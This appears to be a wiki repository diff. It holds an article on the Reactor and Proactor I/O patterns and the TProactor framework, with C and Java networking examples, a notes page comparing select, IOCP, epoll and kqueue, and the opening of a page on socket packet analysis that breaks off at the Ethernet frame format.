By contrast, a **non-blocking synchronous** call returns control to the caller __immediately__. The caller is not made to wait, and the invoked system immediately returns one of two responses: If the call was executed and the results are ready, then the caller is told of that. Alternatively, the invoked system can tell the caller that the system has **no resources** (no data in the socket) to perform the requested action. In that case, it is the responsibility of the caller __to repeat the call until it succeeds.__ For example, a read() operation on a socket in non-blocking mode may return the number of read bytes or a special return code -1 with errno set to **EWOULDBLOCK/EAGAIN**, meaning "not ready; try again later."
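A non-blocking synchronous read of this kind might look as follows in C. This is a minimal sketch; the helper names set_nonblocking and try_read, and the convention of returning -2 for "try again later", are assumptions made for this illustration.

```c
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/* Put a descriptor into non-blocking mode. Returns 0 on success, -1 on error. */
int set_nonblocking(int fd)
{
    int flags = fcntl(fd, F_GETFL, 0);

    if (flags == -1)
        return -1;
    return fcntl(fd, F_SETFL, flags | O_NONBLOCK) == -1 ? -1 : 0;
}

/*
 * Try to read without blocking.
 * Returns the number of bytes read (0 means end of file), -1 on a real
 * error, or -2 when no data is available yet and the caller should retry.
 */
ssize_t try_read(int fd, void *buf, size_t len)
{
    ssize_t n;

    assert(buf != NULL);
    do {
        n = read(fd, buf, len);
    } while (n == -1 && errno == EINTR);   /* retry if interrupted */
    if (n == -1 && (errno == EAGAIN || errno == EWOULDBLOCK))
        return -2;                         /* not ready; try again later */
    return n;
}
```

In practice the retry is not a busy loop: the caller waits on an event demultiplexor such as select() or epoll and calls try_read again once the descriptor is reported readable.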
|
||||
|
||||
In a** non-blocking asynchronous **call, the calling function returns control to the caller immediately, reporting that __the requested action was started__. The calling system will execute the caller's request **using additional system resources/threads** and will notify the caller (by **callback **for example), when the result is ready for processing. For example, a Windows ReadFile() or **POSIX aio_read() API **returns immediately and initiates an internal system read operation. Of the three approaches, __this non-blocking asynchronous approach offers the best scalability and performance__.
|
||||
|
||||
This article investigates different non-blocking I/O multiplexing mechanisms and proposes a single multi-platform design pattern/solution. We hope that this article will help developers of **high performance TCP based servers** to choose the optimal design solution. We also compare the performance of Java, C# and C++ implementations of proposed and existing solutions. We will exclude the blocking approach from further discussion and comparison, as it is the least effective approach for scalability and performance.
|
||||
|
||||
===== Reactor and Proactor: two I/O multiplexing approaches =====
|
||||
|
||||
In general, __I/O multiplexing mechanisms rely on an event demultiplexor __[1, 3], an object that **dispatches I/O events** from a limited number of sources to the appropriate read/write event handlers. The developer __registers__ interest in** specific events **and provides__ event handlers, or callbacks__. The event demultiplexor delivers the requested events to the event handlers.
|
||||
|
||||
Two patterns that involve event demultiplexors are called__ Reactor and Proactor __[1]. The Reactor pattern involves__ synchronous I/O__, whereas the Proactor pattern involves __asynchronous I/O__. In Reactor, the event demultiplexor waits for events that indicate when a file descriptor or socket **is ready for a read or write** operation. The demultiplexor passes this event to the appropriate handler, which is responsible for performing the **actual read or write.**
|
||||
**Note: the write at this point may still block, but a Reactor is normally used with non-blocking I/O.**
|
||||
|
||||
In the Proactor pattern, by contrast, the handler (or the event demultiplexor on behalf of the handler) **initiates asynchronous** read and write operations. The I/O operation itself is__ performed by the operating system (OS)__. The parameters passed to the OS include **the addresses of user-defined data buffers** from which the OS gets data to write, or to which the OS puts data read. The event demultiplexor __waits for events that indicate the completion of the I/O operation__, and forwards those events to the appropriate handlers. For example, on Windows a handler could initiate **async I/O **(overlapped in Microsoft terminology) operations, and the event demultiplexor could wait for IOCompletion events [1]. The implementation of this classic asynchronous pattern is based on an asynchronous __OS-level __API, and we will call this implementation the__ "system-level" or "true" async__, because the application fully relies on the OS to execute the actual I/O.
|
||||
|
||||
===== An example =====
|
||||
An example will help you understand the difference between Reactor and Proactor. We will focus on the **read** operation here, as the write implementation is similar. Here's a read in Reactor:
|
||||
|
||||
* An event handler declares interest in I/O events that indicate **readiness for read **on a particular socket
|
||||
* The event demultiplexor waits for events
|
||||
* An event comes in and wakes-up the demultiplexor, and the demultiplexor **calls the appropriate handler**
|
||||
* The event handler __performs the actual read operation__, handles the data read, **declares renewed interest **in I/O events, and** returns control to the dispatcher**
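The Reactor steps above can be sketched with poll() as the demultiplexor. This is a minimal single-descriptor illustration, not ACE code: reactor_run_once(), ready_handler, read_ctx and echo_on_readable() are hypothetical names chosen for this note.

```c
#include <poll.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical handler type: called when fd is ready for reading. */
typedef void (*ready_handler)(int fd, void *ctx);

/*
 * One turn of a minimal Reactor: wait until fd is readable, then hand
 * control to the handler, which performs the actual read itself.
 * Returns 1 if the handler was called, 0 on timeout, -1 on error.
 */
int reactor_run_once(int fd, ready_handler on_readable, void *ctx, int timeout_ms)
{
    struct pollfd pfd;
    int rc;

    pfd.fd = fd;
    pfd.events = POLLIN;
    pfd.revents = 0;

    rc = poll(&pfd, 1, timeout_ms);   /* the demultiplexor waits for events */
    if (rc <= 0)
        return rc;
    if (pfd.revents & POLLNVAL)
        return -1;                    /* fd was not a valid open descriptor */

    on_readable(fd, ctx);             /* dispatch the readiness event */
    return 1;
}

/* Example handler state and handler: the read happens here, in user code. */
struct read_ctx {
    char buf[64];
    ssize_t got;
};

void echo_on_readable(int fd, void *ctx)
{
    struct read_ctx *rc = ctx;
    rc->got = read(fd, rc->buf, sizeof rc->buf);
}
```

The point to notice is that the dispatcher only reports readiness; the read() call lives in the handler.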
|
||||
|
||||
By comparison, here is a read operation in Proactor (true async):
|
||||
|
||||
* A handler initiates an asynchronous read operation (note: the __OS must support__ asynchronous I/O). In this case, the handler does not care about I/O readiness events, but instead registers interest in__ receiving completion events__.
|
||||
* The event demultiplexor waits until the operation is **completed**
|
||||
* While the event demultiplexor waits, the __OS __executes the read operation in a parallel kernel thread, puts data into a **user-defined buffer,** and notifies the event demultiplexor that the read is complete
|
||||
* The event demultiplexor calls the appropriate handler;
|
||||
* The event handler **handles the data from user defined buffer**, starts a new asynchronous operation, and returns control to the event demultiplexor.
|
||||
|
||||
===== Current practice =====
|
||||
|
||||
The open-source C++ development framework __ACE__ [1, 3] developed by Douglas Schmidt, et al., offers a wide range of platform-independent, low-level concurrency support classes (threading, mutexes, etc). On the top level it provides two separate groups of classes: implementations of the__ ACE Reactor __and __ACE Proactor__. Although both of them are based on platform-independent primitives, these tools offer different interfaces.
|
||||
|
||||
The __ACE Proactor__ gives much better performance and robustness on MS-Windows, as Windows provides a very efficient **async API,** based on operating-system-level support [4, 5].
|
||||
|
||||
Unfortunately, not all operating systems provide full robust __async OS-level__ support. For instance, many Unix systems do not. Therefore, __ACE Reactor__ is a preferable solution in UNIX (currently UNIX does not have robust async facilities for sockets). As a result, to achieve the best performance on each system, developers of networked applications need to **maintain two separate code-bases**: an ACE Proactor based solution on Windows and an ACE Reactor based solution for Unix-based systems.
|
||||
|
||||
As we mentioned, the **true async Proactor **pattern requires operating-system-level support. Due to the differing nature of event handler and operating-system interaction, it is difficult to create common,** unified external interfaces** for both Reactor and Proactor patterns. That, in turn, makes it hard to create a fully portable development framework and encapsulate the interface and OS- related differences.
|
||||
|
||||
===== Proposed solution =====
|
||||
|
||||
In this section, we will propose a solution to the challenge of __designing a portable framework for the Proactor and Reactor I/O patterns__. To demonstrate this solution, we will __transform a Reactor demultiplexor I/O solution to an emulated async I/O__ by moving read/write operations from event handlers inside the demultiplexor (this is "emulated async" approach). The following example illustrates that conversion for a read operation:
|
||||
|
||||
* An event handler declares interest in** I/O events** (readiness for read) and provides the demultiplexor with information such as the **address of a data buffer**, or the **number **of bytes to read.
|
||||
* Dispatcher waits for events (for example, on select());
|
||||
* When an event arrives, it wakes up the dispatcher. The dispatcher performs **a non-blocking read operation** (it has all necessary information to perform this operation) and on __completion__ calls the appropriate handler.
|
||||
* The event handler handles data from the user-defined buffer, __declares new interest,__ along with information about where to put the data buffer and the number of bytes to read in I/O events. The event handler then returns control to the dispatcher.
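The conversion described in the steps above can be sketched by moving the read() call out of the handler and into the dispatcher. This is an illustration under assumptions, not TProactor's implementation: struct read_op, proactor_run_once() and store_result() are hypothetical names, and the descriptor is assumed to be in non-blocking mode.

```c
#include <poll.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical description of a pending read, supplied by the handler. */
struct read_op {
    int fd;                 /* descriptor to read from */
    void *buf;              /* user-defined buffer for the data */
    size_t len;             /* number of bytes to read */
    void *user_data;        /* opaque pointer passed back to the callback */
    void (*on_complete)(struct read_op *op, ssize_t result);
};

/*
 * One turn of an emulated Proactor: wait for readiness, perform the read
 * on behalf of the handler, then report completion.
 * Returns 1 if a completion was delivered, 0 on timeout, -1 on error.
 */
int proactor_run_once(struct read_op *op, int timeout_ms)
{
    struct pollfd pfd;
    ssize_t n;
    int rc;

    pfd.fd = op->fd;
    pfd.events = POLLIN;
    pfd.revents = 0;

    rc = poll(&pfd, 1, timeout_ms);        /* step 1: wait for event */
    if (rc <= 0)
        return rc;

    n = read(op->fd, op->buf, op->len);    /* step 2: the dispatcher reads */
    op->on_complete(op, n);                /* step 3: dispatch "read completed" */
    return 1;
}

/* Example completion callback: just records how many bytes arrived. */
void store_result(struct read_op *op, ssize_t result)
{
    *(ssize_t *)op->user_data = result;
}
```

Compared with a Reactor loop, the amount of work is the same; only the place where read() is called has moved, so the handler sees a completion event rather than a readiness event.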
|
||||
|
||||
As we can see, by **adding functionality** to the demultiplexor I/O pattern, we were able to__ convert the Reactor pattern to a Proactor pattern__. In terms of the amount of work performed, this approach is exactly the same as the Reactor pattern. We simply** shifted responsibilities between different actors.** There is no performance degradation because the amount of work performed is still the same. The work was simply performed __by different actors. __The following lists of steps demonstrate that each approach performs an equal amount of work:
|
||||
|
||||
==== Standard/classic Reactor: ====
|
||||
|
||||
Step 1) wait for event (**Reactor** job)
|
||||
Step 2) dispatch "Ready-to-Read" event to user handler ( Reactor job)
|
||||
Step 3) **read data** (**user handler** job)
|
||||
Step 4) process data ( user handler job)
|
||||
|
||||
==== Proposed emulated Proactor: ====
|
||||
|
||||
Step 1) wait for event (Proactor job)
|
||||
Step 2) read data (now __Proactor job__)
|
||||
Step 3) dispatch "Read-Completed" event to user handler (Proactor job)
|
||||
Step 4) process data (**user handler** job)
|
||||
|
||||
With an operating system that does not provide an async I/O API, this approach allows us to hide the reactive nature of available socket APIs and to__ expose a fully proactive async interface__. This allows us to create a fully portable platform-independent solution with a common external interface.
|
||||
|
||||
===== TProactor =====
|
||||
|
||||
The proposed solution (TProactor) was developed and implemented at Terabit P/L [6]. The solution has two alternative implementations, one in C++ and one in Java. The C++ version was built** using ACE cross-platform low-level primitives** and has__ a common unified async proactive interface on all platforms__.
|
||||
|
||||
The main TProactor components are the __Engine __**and **__WaitStrategy__** interfaces**. Engine manages the async operations lifecycle. WaitStrategy manages concurrency strategies. WaitStrategy depends on Engine and the two always work in pairs. Interfaces between Engine and WaitStrategy are **strongly defined**.
|
||||
|
||||
Engines and waiting strategies are implemented as __pluggable class-drivers__ (for the full list of all implemented Engines and corresponding WaitStrategies, see Appendix 1). TProactor is a** highly configurable **solution. It internally implements three engines (__POSIX AIO__, SUN AIO and Emulated AIO) and hides six different waiting strategies, based on an** asynchronous kernel API **(for POSIX this is not efficient right now due to internal POSIX AIO API problems) and **synchronous** Unix select(), poll(), /dev/poll (Solaris 5.8+), port_get (Solaris 5.10), __RealTime __(RT) signals (Linux 2.4+), __epoll __(Linux 2.6), __k-queue__ (FreeBSD) APIs. TProactor conforms to the standard ACE Proactor implementation interface. That makes it possible to develop a single cross-platform solution (POSIX/MS-WINDOWS) with a common (ACE Proactor) interface.
|
||||
|
||||
With a set of mutually interchangeable "lego-style" Engines and WaitStrategies, a developer can choose the appropriate internal mechanism (engine and waiting strategy) at run time by** setting appropriate configuration parameters. **These settings may be specified according to specific requirements, such as the number of connections, scalability, and the targeted OS. If the operating system supports an async API, a developer may use the true async approach; otherwise the developer can opt for an emulated async solution built on different sync waiting strategies. All of those strategies are hidden behind an emulated async façade.
|
||||
|
||||
For an HTTP server running on Sun Solaris, for example, the /dev/poll or port_get()-based engines are the most suitable choice, able to serve a huge number of connections, but for another UNIX solution with a limited number of connections but high throughput requirements, a select()-based engine may be a better approach. Such flexibility cannot be achieved with a standard ACE Reactor/Proactor, due to inherent algorithmic problems of different wait strategies (see Appendix 2).
|
||||
|
||||
In terms of performance, our tests show that emulating from reactive to proactive does not impose any overhead; it can be faster, but not slower. According to our test results, the TProactor gives, on average, up to 10-35% better performance (measured in terms of both throughput and response times) than the reactive model in the standard ACE Reactor implementation on various UNIX/Linux platforms. On Windows it gives the same performance as the standard ACE Proactor.
|
||||
|
||||
===== Performance comparison (JAVA versus C++ versus C#). =====
|
||||
|
||||
In addition to C++, we also implemented TProactor in Java. As of JDK version 1.4, Java provides only the sync-based approach that is logically similar to C select() [7, 8]. Java TProactor is based on Java's non-blocking facilities (java.nio packages) and is logically similar to C++ TProactor with a waiting strategy based on select().
|
||||
|
||||
Figures 1 and 2 chart the transfer rate in bits/sec versus the number of connections. These charts represent comparison results for a simple echo-server built on standard ACE Reactor, using RedHat Linux 9.0, TProactor C++ and Java (IBM 1.4JVM) on Microsoft's Windows and RedHat Linux9.0, and a C# echo-server running on the Windows operating system. Performance of native AIO APIs is represented by "Async"-marked curves; by emulated AIO (TProactor)—AsyncE curves; and by TP_Reactor—Synch curves. All implementations were bombarded by the same client application—a continuous stream of arbitrary fixed sized messages via N connections.
|
||||
|
||||
The full set of tests was performed on the same hardware. Tests on different machines proved that relative results are consistent.
|
||||
Figure 1. Windows XP/P4 2.6GHz HyperThreading/512 MB RAM.
|
||||
Figure 2. Linux RedHat 2.4.20-smp/P4 2.6GHz HyperThreading/512 MB RAM.
|
||||
|
||||
===== User code example =====
|
||||
|
||||
The following is the skeleton of a simple TProactor-based Java echo-server. In a nutshell, the developer only has to implement the two interfaces: OpRead with buffer where TProactor puts its read results, and OpWrite with a buffer from which TProactor takes data. The developer will also need to implement protocol-specific logic via providing callbacks onReadCompleted() and onWriteCompleted() in the AsynchHandler interface implementation. Those callbacks will be asynchronously called by TProactor on completion of read/write operations and executed on a thread pool space provided by TProactor (the developer doesn't need to write his own pool).
|
||||
|
||||
class EchoServerProtocol implements AsynchHandler
|
||||
{
|
||||
|
||||
AsynchChannel achannel = null;
|
||||
|
||||
EchoServerProtocol( Demultiplexor m, SelectableChannel channel ) throws Exception
|
||||
{
|
||||
this.achannel = new AsynchChannel( m, this, channel );
|
||||
}
|
||||
|
||||
public void start() throws Exception
|
||||
{
|
||||
// called after construction
|
||||
System.out.println( Thread.currentThread().getName() + ": EchoServer protocol started" );
|
||||
achannel.read( buffer);
|
||||
}
|
||||
|
||||
public void onReadCompleted( OpRead opRead ) throws Exception
|
||||
{
|
||||
if ( opRead.getError() != null )
|
||||
{
|
||||
// handle error, do clean-up if needed
|
||||
System.out.println( "EchoServer::readCompleted: " + opRead.getError().toString());
|
||||
achannel.close();
|
||||
return;
|
||||
}
|
||||
|
||||
if ( opRead.getBytesCompleted () <= 0)
|
||||
{
|
||||
System.out.println( "EchoServer::readCompleted: Peer closed " + opRead.getBytesCompleted() );
|
||||
achannel.close();
|
||||
return;
|
||||
}
|
||||
|
||||
ByteBuffer buffer = opRead.getBuffer();
|
||||
|
||||
achannel.write(buffer);
|
||||
}
|
||||
|
||||
public void onWriteCompleted(OpWrite opWrite) throws Exception
|
||||
{
|
||||
// logically similar to onReadCompleted
|
||||
...
|
||||
}
|
||||
}
|
||||
|
||||
IOHandler is a TProactor base class. AsynchHandler and Multiplexor, among other things, internally execute the wait strategy chosen by the developer.
|
||||
|
||||
===== Conclusion =====
|
||||
|
||||
TProactor provides a common, flexible, and configurable solution for multi-platform high-performance communications development. All of the problems and complexities mentioned in Appendix 2 are hidden from the developer.
|
||||
|
||||
It is clear from the charts that C++ is still the preferable approach for high performance communication solutions, but Java on Linux comes quite close. However, the overall Java performance was weakened by poor results on Windows. One reason for that may be that the Java 1.4 nio package is based on a select()-style API. Indeed, the Java NIO package is a kind of Reactor pattern based on a select()-style API (see [7, 8]). Java NIO allows you to write your own select()-style provider (the equivalent of TProactor waiting strategies). Looking at the Java NIO implementation for Windows (it is enough to examine the import symbols in jdk1.5.0\jre\bin\nio.dll), we can conclude that Java NIO 1.4.2 and 1.5.0 for Windows is based on the WSAEventSelect() API. That is better than select(), but slower than IOCompletionPorts for a significant number of connections. Should the 1.5 version of Java's nio be based on IOCompletionPorts, then that should improve performance. If Java NIO used IOCompletionPorts, then the conversion of the Proactor pattern to the Reactor pattern would have to be made inside nio.dll. Although such a conversion is more complicated than the Reactor->Proactor conversion, it can be implemented within the framework of the Java NIO interfaces (this is the topic of the next article, but we can provide the algorithm). At this time, no TProactor performance tests were done on JDK 1.5.
|
||||
|
||||
Note. All tests for Java are performed on "raw" buffers (java.nio.ByteBuffer) without data processing.
|
||||
|
||||
Taking into account the latest activities to develop robust AIO on Linux [9], we can conclude that Linux Kernel API (io_xxxx set of system calls) should be more scalable in comparison with POSIX standard, but still not portable. In this case, TProactor with new Engine/Wait Strategy pair, based on native LINUX AIO can be easily implemented to overcome portability issues and to cover Linux native AIO with standard ACE Proactor interface.
|
||||
|
||||
===== Appendix I =====
|
||||
|
||||
Engines and waiting strategies implemented in TProactor
|
||||
|
||||
Each engine type is listed with its wait strategies and the operating systems they apply to (wait strategy: operating system):

* POSIX_AIO (true async), aio_read()/aio_write()
	* aio_suspend(): POSIX-compliant UNIX (not robust)
	* Waiting for RT signal: POSIX (not robust)
	* Callback function: SGI IRIX, LINUX (not robust)
* SUN_AIO (true async), aio_read()/aio_write()
	* aio_wait(): SUN (not robust)
* Emulated Async, non-blocking read()/write()
	* select(): generic POSIX
	* poll(): mostly all POSIX implementations
	* /dev/poll: SUN
	* Linux RT signals: Linux
	* Kqueue: FreeBSD
|
||||
===== Appendix II =====
|
||||
|
||||
All sync waiting strategies can be divided into two groups:
|
||||
|
||||
edge-triggered (e.g. Linux RT signals)—signal readiness only when socket became ready (changes state);
|
||||
level-triggered (e.g. select(), poll(), /dev/poll)—readiness at any time.
|
||||
|
||||
Let us describe some common logical problems for those groups:
|
||||
|
||||
edge-triggered group: after executing an I/O operation, the demultiplexing loop can lose the state of socket readiness. Example: the "read" handler did not read the whole chunk of data, so the socket still remains ready for read. But the demultiplexor loop will not receive the next notification.
|
||||
level-triggered group: when the demultiplexor loop detects readiness, it starts the user-defined write/read handler. But before the start, it should remove the socket descriptor from the set of monitored descriptors. Otherwise, the same event can be dispatched twice.
|
||||
Obviously, solving these problems adds extra complexities to development. All these problems were resolved internally within TProactor and the developer should not worry about those details, while in the synch approach one needs to apply extra effort to resolve them.
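One common way to cope with the edge-triggered problem described above is to keep reading until the descriptor reports that it would block, so that no readiness state is left behind. The sketch below shows that idea only; it is not taken from TProactor, drain_fd() is a hypothetical name, and the descriptor is assumed to be in non-blocking mode.

```c
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Read from a non-blocking descriptor until it reports "would block".
 * Returns the total number of bytes consumed (stopping early at end of
 * stream), or -1 on a real error. The data is discarded here; a real
 * handler would process each chunk.
 */
long drain_fd(int fd)
{
    char chunk[4];   /* deliberately tiny so that several reads are needed */
    long total = 0;

    for (;;) {
        ssize_t n = read(fd, chunk, sizeof chunk);
        if (n > 0) {
            total += n;
            continue;
        }
        if (n == 0)
            return total;                       /* end of stream */
        if (errno == EINTR)
            continue;                           /* interrupted, retry */
        if (errno == EAGAIN || errno == EWOULDBLOCK)
            return total;                       /* nothing left: safe to wait again */
        return -1;
    }
}
```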
|
||||
|
||||
Resources
|
||||
|
||||
[1] Douglas C. Schmidt, Stephen D. Huston "C++ Network Programming." 2002, Addison-Wesley ISBN 0-201-60464-7
|
||||
|
||||
[2] W. Richard Stevens "UNIX Network Programming" vol. 1 and 2, 1999, Prentice Hall, ISBN 0-13-490012-X
|
||||
|
||||
[3] Douglas C. Schmidt, Michael Stal, Hans Rohnert, Frank Buschmann "Pattern-Oriented Software Architecture: Patterns for Concurrent and Networked Objects, Volume 2" Wiley & Sons, NY 2000
|
||||
|
||||
[4] INFO: Socket Overlapped I/O Versus Blocking/Non-blocking Mode. Q181611. Microsoft Knowledge Base Articles.
|
||||
|
||||
[5] Microsoft MSDN. I/O Completion Ports.
|
||||
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/fileio/fs/i_o_completion_ports.asp
|
||||
|
||||
[6] TProactor (ACE compatible Proactor).
|
||||
www.terabit.com.au
|
||||
|
||||
[7] JavaDoc java.nio.channels
|
||||
http://java.sun.com/j2se/1.4.2/docs/api/java/nio/channels/package-summary.html
|
||||
|
||||
[8] JavaDoc Java.nio.channels.spi Class SelectorProvider
|
||||
http://java.sun.com/j2se/1.4.2/docs/api/java/nio/channels/spi/SelectorProvider.html
|
||||
|
||||
[9] Linux AIO development
|
||||
http://lse.sourceforge.net/io/aio.html, and
|
||||
http://archive.linuxsymposium.org/ols2003/Proceedings/All-Reprints/Reprint-Pulavarty-OLS2003.pdf
|
||||
|
||||
See Also:
|
||||
|
||||
Ian Barile "I/O Multiplexing & Scalable Socket Servers", 2004 February, DDJ
|
||||
|
||||
Further reading on event handling
|
||||
- http://www.cs.wustl.edu/~schmidt/ACE-papers.html
|
||||
|
||||
The Adaptive Communication Environment
|
||||
http://www.cs.wustl.edu/~schmidt/ACE.html
|
||||
|
||||
Terabit Solutions
|
||||
http://terabit.com.au/solutions.php
|
||||
About the authors
|
||||
|
||||
Alex Libman has been programming for 15 years. During the past 5 years his main area of interest has been pattern-oriented multiplatform networked programming using C++ and Java. He is a big fan of and contributor to ACE.

Vlad Gilbourd works as a computer consultant, but wishes to spend more time listening to jazz :) As a hobby, he started and runs the www.corporatenews.com.au website.
|
||||
|
||||
BIN
Zim/Programme/APUE/Proactor和Reactor模式/proactor_uml_thumb.jpg
Normal file
|
After Width: | Height: | Size: 51 KiB |
@@ -0,0 +1,78 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2012-02-27T21:10:43+08:00
|
||||
|
||||
====== select, IOCP, epoll, kqueue and other I/O multiplexing mechanisms revisited ======
|
||||
Created Monday 27 February 2012
|
||||
|
||||
http://blog.csdn.net/shallwake/article/details/5265287
|
||||
|
||||
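I am a beginner too; learning is itself a continual pursuit of the truth, so please bear with any mistakes :)

First, an overview of the common I/O models and how they differ: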
|
||||
|
||||
* blocking I/O
|
||||
* nonblocking I/O
|
||||
* I/O multiplexing (select and poll)
|
||||
* __signal driven I/O__ (SIGIO)
|
||||
* __asynchronous I/O__ (the POSIX aio_functions)
|
||||
|
||||
===== blocking I/O =====
|
||||
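This one needs little explanation: a blocking socket. The figure below shows the call sequence:
{{./1.jpg}}
The figure deserves a closer look, because the later examples all refer back to it. The application first calls recvfrom() and enters the kernel. Note that the kernel goes through two phases: wait for data, and copy data from kernel to user. recvfrom() returns only after the copy is complete, and the application is blocked the whole time.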
|
||||
|
||||
===== nonblocking I/O: =====
|
||||
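The opposite of blocking I/O: a non-blocking socket. The call sequence is shown below:
{{./2.jpg}}
As the figure shows, __using it directly amounts to polling__ until data arrives in the kernel buffer.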
|
||||
|
||||
===== I/O multiplexing (select and poll) =====
|
||||
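The most common I/O multiplexing model is select.
{{./3.jpg}}
select blocks first and __returns only when a socket becomes active__. Compared with blocking I/O, select costs two system calls (select itself, then the actual read), but it can handle __multiple sockets__.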
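The two system calls mentioned above can be seen in a small C sketch. It watches a single descriptor for brevity, although the point of select() is that the set can hold many. read_when_ready() and its return codes are hypothetical, chosen only for this note.

```c
#include <stddef.h>
#include <sys/select.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * Wait with select() until fd is readable, then read from it.
 * Returns the result of read() (bytes read, 0 at end of stream, -1 on a
 * read error), -1 if select() itself fails, or -2 if the timeout expires
 * first.
 */
ssize_t read_when_ready(int fd, void *buf, size_t len, int timeout_ms)
{
    fd_set readable;
    struct timeval tv;
    int rc;

    FD_ZERO(&readable);
    FD_SET(fd, &readable);
    tv.tv_sec = timeout_ms / 1000;
    tv.tv_usec = (timeout_ms % 1000) * 1000;

    /* System call 1: block until fd is readable or the timeout expires. */
    rc = select(fd + 1, &readable, NULL, NULL, &tv);
    if (rc < 0)
        return -1;
    if (rc == 0 || !FD_ISSET(fd, &readable))
        return -2;

    /* System call 2: the read itself, which no longer has to wait for data. */
    return read(fd, buf, len);
}
```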
|
||||
|
||||
===== signal driven I/O (SIGIO) =====
|
||||
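Supported only on UNIX systems; interested readers can consult the relevant material.
{{./4.jpg}}
Compared with I/O multiplexing (select and poll), its advantage is that it __avoids select's blocking and polling__: when a socket becomes active, the registered handler deals with it.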
|
||||
|
||||
===== asynchronous I/O (the POSIX aio_functions) =====
|
||||
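Few *nix systems support it; __Windows__ IOCP follows this model.
{{./5.jpg}}
This is a __fully asynchronous I/O mechanism__: in each of the other four models the application blocks at least while the kernel copies data to the application, whereas in this model the application is __notified only after the copy has completed__, so it is purely asynchronous. As far as I know, only Windows completion ports follow this model, and they perform very well.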
|
||||
|
||||
===== Comparison of the five models =====
{{./6.jpg}}
The further down the list, the less blocking there is, and in theory the better the efficiency.
|
||||
|
||||
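=====================Divider==================================

With the five models compared, what remains is to match select, epoll, IOCP and kqueue to them.

select and IOCP correspond to the third and fifth models respectively. What about epoll and kqueue? They __belong to the same model as select, only more advanced__; they can be seen as borrowing some traits of the fourth model, such as the __callback mechanism__.

==== So why are epoll and kqueue more advanced than select? ====

The answer is that __they do not poll; callbacks take the place of polling__. Consider what happens with many sockets: every select() call has to __scan__ up to FD_SETSIZE sockets to do its scheduling, whether or not a given socket is active, which wastes a lot of CPU time. If **a callback can be registered for each socket so that the relevant work happens automatically when the socket becomes active, the polling is avoided**, and that is exactly what epoll and kqueue do.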
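A small Linux-only sketch of the difference: with epoll, the descriptors are registered once and epoll_wait() hands back only the ones that are ready, so user code does not scan the whole set. first_ready_fd() is a hypothetical helper written for this note; it creates and destroys the epoll instance on every call purely to stay self-contained, whereas a real server would keep the instance alive.

```c
#include <sys/epoll.h>
#include <unistd.h>

/*
 * Registers every descriptor in fds[] for read readiness, waits up to
 * timeout_ms, and returns one descriptor that is ready for reading.
 * Returns -1 on timeout or error.
 */
int first_ready_fd(const int *fds, int nfds, int timeout_ms)
{
    struct epoll_event ev;
    struct epoll_event ready;
    int result = -1;
    int i;
    int ep = epoll_create1(0);

    if (ep == -1)
        return -1;

    for (i = 0; i < nfds; ++i) {
        ev.events = EPOLLIN;
        ev.data.fd = fds[i];
        if (epoll_ctl(ep, EPOLL_CTL_ADD, fds[i], &ev) == -1) {
            close(ep);
            return -1;
        }
    }

    /* The kernel reports only ready descriptors; there is no loop over fds[]. */
    if (epoll_wait(ep, &ready, 1, timeout_ms) == 1)
        result = ready.data.fd;

    close(ep);
    return result;
}
```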
|
||||
|
||||
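==== Windows or *nix (IOCP or kqueue/epoll)? ====

Admittedly, Windows IOCP is excellent, and few systems currently support asynchronous I/O. But because of limitations of the system itself, large servers still run on UNIX. As noted above, compared with IOCP, kqueue/epoll merely add __one blocking step while data is copied from the kernel to the application__, which is why they do not count as asynchronous I/O. That small amount of blocking hardly matters, though, and kqueue and epoll already do very well.

==== Providing a uniform interface: I/O design patterns ====

In fact, whichever model is used, **a layer can be abstracted on top of it to provide a uniform interface**. Well-known examples are ACE and __Libevent__; both are cross-platform and **automatically select the best I/O multiplexing mechanism**, so the user only has to call the interface. This brings up two design patterns, __Reactor and Proactor__. The classic article http://www.artima.com/articles/io_design_patterns.html is worth reading. Libevent follows the Reactor model and ACE provides the Proactor model. Both are really wrappers around the various I/O multiplexing mechanisms.

===== Which I/O mechanism does the Java nio package use? =====

I once naively assumed that Java nio wrapped IOCP. I can now confirm that __Java is currently, in essence, the select() model__, which can be checked by inspecting /jre/bin/nio.dll. As for why Java servers still perform reasonably well, I do not know; perhaps they are simply well designed. -_-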
|
||||
|
||||
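=====================Divider==================================

===== Key points =====

* Only IOCP is asynchronous I/O; every other mechanism blocks at least a little.
* select is inefficient because it has to poll on every call. But inefficiency is relative: it depends on the situation and can be mitigated by good design.
* epoll and kqueue follow the Reactor pattern; IOCP follows the Proactor pattern.
* The Java nio package uses the select model.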
|
||||
|
After Width: | Height: | Size: 12 KiB |
|
After Width: | Height: | Size: 20 KiB |
|
After Width: | Height: | Size: 17 KiB |
|
After Width: | Height: | Size: 18 KiB |
|
After Width: | Height: | Size: 14 KiB |
|
After Width: | Height: | Size: 22 KiB |
351
Zim/Programme/APUE/Socket数据包分析.txt
Normal file
@@ -0,0 +1,351 @@
|
||||
Content-Type: text/x-zim-wiki
|
||||
Wiki-Format: zim 0.4
|
||||
Creation-Date: 2011-06-04T14:37:59+08:00
|
||||
|
||||
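====== Socket packet analysis ======
Created Saturday 04 June 2011
http://www.cublog.cn/u2/78978/showart_2082876.html
Socket packet analysis
By analysing packets we can determine the operating systems of the two communicating parties, the volume of network traffic, the routes traversed, the packet sizes, the packet contents, and so on. For anyone interested in network security, this knowledge is essential. Most data in today's network traffic is unencrypted, so account names, passwords and other data of interest can easily be extracted from packets. If you find this article hard going, read up on computer networking, C programming and protocol analysis first. Below, the design of a packet-analysis program is covered in three parts: the structure of the TCP/IP protocol family, the functions and data structures used by the program, and a walkthrough of a sample program.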
|
||||
|
||||
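Part 1: Structure of the TCP/IP protocol family
Before turning to TCP/IP, let us first look at Ethernet, since it is what we meet most often and packet analysis cannot be separated from Ethernet frames. On Ethernet, data is exchanged in units of a data structure called a frame. The access protocol commonly used on Ethernet is CSMA/CD (carrier sense multiple access with collision detection); what concerns us here is the frame format. There are two common standards for the Ethernet frame format: DIX Ethernet V2 and IEEE 802.3. The most common MAC frame today is the V2 format, which is the one studied here; 802.3 frames are not discussed further. The Ethernet V2 frame format is:
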